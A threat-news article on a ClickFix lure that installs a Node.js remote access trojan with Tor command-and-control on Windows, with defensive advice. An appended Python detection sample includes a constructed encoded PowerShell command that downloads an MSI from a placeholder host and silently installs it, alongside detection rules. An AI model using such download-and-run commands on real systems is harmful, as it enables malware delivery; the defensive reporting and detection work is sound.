ClickFix Lure Drops Node.js RAT, Tor C2 on Windows Users
Key Takeaways
- A new social engineering campaign, dubbed ClickFix, is deploying a sophisticated Node.js-based Remote Access Trojan (RAT) on Windows systems.
- The malware establishes a covert communication channel via the Tor network, making C2 infrastructure difficult to trace.
- This iteration of ClickFix leverages a modular, memory-resident RAT architecture, enhancing its stealth and evasion capabilities.
- The threat actors operate a Malware-as-a-Service (MaaS) platform, accidentally exposing an administrative panel that revealed extensive operational features.
Windows users are currently facing a new wave of cyberattacks employing a Node.js-based Remote Access Trojan (RAT), distributed through a social engineering tactic known as ClickFix. Attackers manipulate victims with a deceptive browser verification page, compelling them to execute a concealed command that surreptitiously installs the RAT onto their systems.
Once established, the malware communicates with its operators via the Tor network. This obfuscation masks traffic, rendering the attacker’s command-and-control (C2) infrastructure extremely challenging to trace or dismantle, as detailed by Netskope Threat Labs.
Evolution of the ClickFix Campaign
The ClickFix delivery method first gained prominence in early 2025. At that time, threat actors utilized it to distribute established malware families such as LegionLoader and LummaStealer to compromise machines.
The technique involves presenting a fabricated CAPTCHA or identity verification page. Users are then instructed to manually copy and execute a command from their clipboard.
In the most recent campaign, this command initiates a base64-encoded PowerShell script. This script downloads a malicious installer file, named NodeServer-Setup-Full.msi, from a fraudulent domain and proceeds to install it silently in the background, without any visible user prompts.
Researchers at Netskope Threat Labs have extensively monitored this campaign. They highlight that its overall design exhibits a significantly higher level of sophistication compared to previous ClickFix operations.
Advanced Modular RAT Architecture
The RAT itself is constructed upon a modular Node.js framework. This design means that its most potent functionalities are never persistently stored on the victim’s hard drive. Instead, these capabilities are delivered entirely in memory, only after the malware successfully establishes a connection to its C2 server. This approach significantly enhances its ability to bypass conventional security scans.
A particularly concerning aspect of this campaign is the robust criminal infrastructure supporting it. The attackers have developed a Malware-as-a-Service (MaaS) platform, enabling multiple operators to access and deploy the RAT against their own targets.
An operational security lapse by the threat actors inadvertently exposed the server-side administrative panel. This exposure revealed features such as tracking cryptocurrency wallets, managing multiple operators with role-based access controls, pushing custom modules to infected machines, and sending real-time Telegram alerts upon new victim connections.
Furthermore, the malware meticulously profiles each compromised machine. It gathers details including the operating system version, hardware specifications, geographic location, external IP address, and a comprehensive list of active security tools. This fingerprinting process aids operators in determining which victims warrant further exploitation.
The malware actively scans for over 30 antivirus and endpoint security products, including prominent solutions like CrowdStrike, Kaspersky, SentinelOne, and Windows Defender.
How the Infection Persists and Communicates
Upon execution of the MSI installer, the malware extracts its components into the %LOCALAPPDATA%\LogicOptimizer folder. It then establishes a persistence mechanism by registering an entry under the Windows Registry Run key, ensuring automatic startup with each user login.
The malware leverages conhost.exe in headless mode to discreetly launch Node.js, rendering the entire process invisible to the user. This method prevents the appearance of taskbar or window alerts that might raise suspicion and expose the infection.
Before initiating communication with its C2 server, the malware undergoes several layers of decryption, utilizing AES-256-CBC and XOR methods to fully reveal its configuration data. The encryption keys are dynamically reshuffled with every execution, effectively thwarting static analysis attempts by reverse engineers. Once decrypted, the configuration uncovers a .onion Tor hidden service address designated as the C2 server.
To establish this connection, the malware downloads the Tor Expert Bundle directly from the official Tor Project website and creates a SOCKS5 proxy on the local machine. It then connects using gRPC, a streaming protocol facilitating real-time, bidirectional communication between the compromised system and the C2 operator.
All theft modules and commands are transmitted from the server as JavaScript strings, executed within a Node.js sandbox in memory, and are never written to disk. A built-in watchdog process continuously monitors the connection, automatically restarting it if it drops.
What You Should Do
- Monitor endpoints for unusual Node.js or conhost.exe processes running in unexpected contexts.
- Inspect network traffic for any anomalous Tor connections or outbound communications to .onion domains.
- Regularly review Windows Registry Run keys for new or suspicious entries that establish persistence.
- Configure firewalls and network proxies to block outbound connections to known .onion domains.
- Implement security policies to flag or block MSI files silently downloaded via PowerShell scripts.
- Conduct regular user awareness training to educate employees about social engineering tactics, particularly those involving deceptive browser verification pages and instructions to run unfamiliar commands.
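The endpoint and registry checks above, as an added Python example that is not from the article or from Netskope: it decodes a PowerShell -EncodedCommand argument and applies four rules derived from the article's indicators (headless conhost.exe launching node.exe, the LogicOptimizer staging folder, a Run key pointing into %LOCALAPPDATA%, and encoded PowerShell that runs msiexec) to constructed Sysmon-style events. The script text, SID, user name and placeholder domain are all made up for the sample.

```python
import base64
import re

# Constructed stand-in (not from the article) for the base64-encoded PowerShell
# a ClickFix lure asks the user to paste; the domain is a placeholder.
CONSTRUCTED_SCRIPT = (r"Invoke-WebRequest http://placeholder.invalid/NodeServer-Setup-Full.msi "
                      r"-OutFile $env:TEMP\s.msi; msiexec /i $env:TEMP\s.msi /qn")
ENCODED_STUB = base64.b64encode(CONSTRUCTED_SCRIPT.encode("utf-16le")).decode()

# Constructed Sysmon-style events: id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"conhost.exe --headless C:\Users\alice\AppData\Local\LogicOptimizer\node.exe app.js"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "node.exe server.js"},  # benign developer use, must not alert
    {"id": 13, "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\LogicOptimizer",
     "details": r"C:\Users\alice\AppData\Local\LogicOptimizer\start.cmd"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -w hidden -enc " + ENCODED_STUB},
]

def decode_encoded_command(cmdline):
    """Return the script behind -enc/-EncodedCommand (UTF-16LE base64), or '' if absent/invalid."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""

def classify(event):
    """Return the names of the article's indicators that one event matches."""
    hits = []
    if event["id"] == 1:
        cmd = event["cmdline"].lower()
        if "conhost.exe" in cmd and "--headless" in cmd and "node.exe" in cmd:
            hits.append("headless_conhost_node")  # hidden Node.js launch
        if "logicoptimizer" in cmd:
            hits.append("logicoptimizer_path")  # staging folder on the command line
        decoded = decode_encoded_command(event["cmdline"]).lower()
        if "msiexec" in decoded and ".msi" in decoded:
            hits.append("encoded_ps_silent_msi")  # encoded PowerShell installing an MSI
    elif event["id"] == 13:
        if "\\currentversion\\run\\" in event["target"].lower() \
                and "appdata\\local" in event["details"].lower():
            hits.append("run_key_to_localappdata")  # Run-key persistence into %LOCALAPPDATA%
    return hits
```

Feed real Sysmon Event ID 1 and 13 records into `classify` in the same shape; the benign node.exe event shows the rules key on context (headless conhost, staging path, Run key target) rather than on Node.js alone.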
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.